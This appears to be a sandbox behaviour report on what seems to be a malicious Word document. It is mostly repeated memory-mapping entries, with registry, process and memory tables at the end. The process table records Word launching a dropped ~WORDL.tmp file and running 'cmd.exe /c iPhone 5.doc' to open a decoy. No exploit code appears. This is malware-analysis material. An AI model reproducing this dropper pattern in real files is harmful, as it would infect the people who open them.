C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\3430B573.wmf query and read commit 39F0000 114688 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL write and read and execute commit 39F0000 1703936 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL query and write and read and execute image 39F0000 1708032 own pid read write conflicting addresses 1
\KnownDlls\WTSAPI32.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp query and write and read and execute and extend size image 76360000 65536 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit FF20000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 24C30000 1208320 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp query and read commit FF20000 90112 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image FF20000 90112 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 24C30000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit FF30000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit FF30000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit FF30000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit FF30000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit FF30000 389120 own pid readonly success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12259328 own pid execute success or wait 1 30003071
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12304384 own pid read write success or wait 1 30003071
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003071
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1 30029E78
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 30029E78
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1 30029E78
\BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown unknown unknown unknown unknown object name not found 1 3002AA90
\BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit A90000 4096 own pid read write success or wait 1 3002AAA7
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 28E0000 2588672 own pid execute success or wait 1 30294584
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and write and read and execute image 65000000 2588672 own pid read write success or wait 1 30294584
\KnownDlls\MSIMG32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 30003601
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 30003601

Registry Activites
Key Path Completion Count Source Address Symbol
Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion CommonFilesDir success or wait 1 3000303D RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA Vbe6DllPath success or wait 1 3029455F RegQueryValueExA

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Created
PID Filepath Cmdline Flags Completion Count Source Address Symbol
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp none success or wait 1 C0D0276 WinExec
1096 C:\WINDOWS\system32\cmd.exe cmd.exe /c iPhone 5.doc none success or wait 1 C0D035D WinExec
Process Queried
PID Process info class Completion Count Source Address Symbol
1160 QuotaLimits success or wait 9 30007F87 GlobalMemoryStatusEx
1160 VmCounters success or wait 9 30007F87 GlobalMemoryStatusEx

Thread Activites
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol
TID PID Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
Memory Protection Changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1160 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B81000 1000 page readonly page read and write success or wait 1 30001C81 VirtualProtect
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
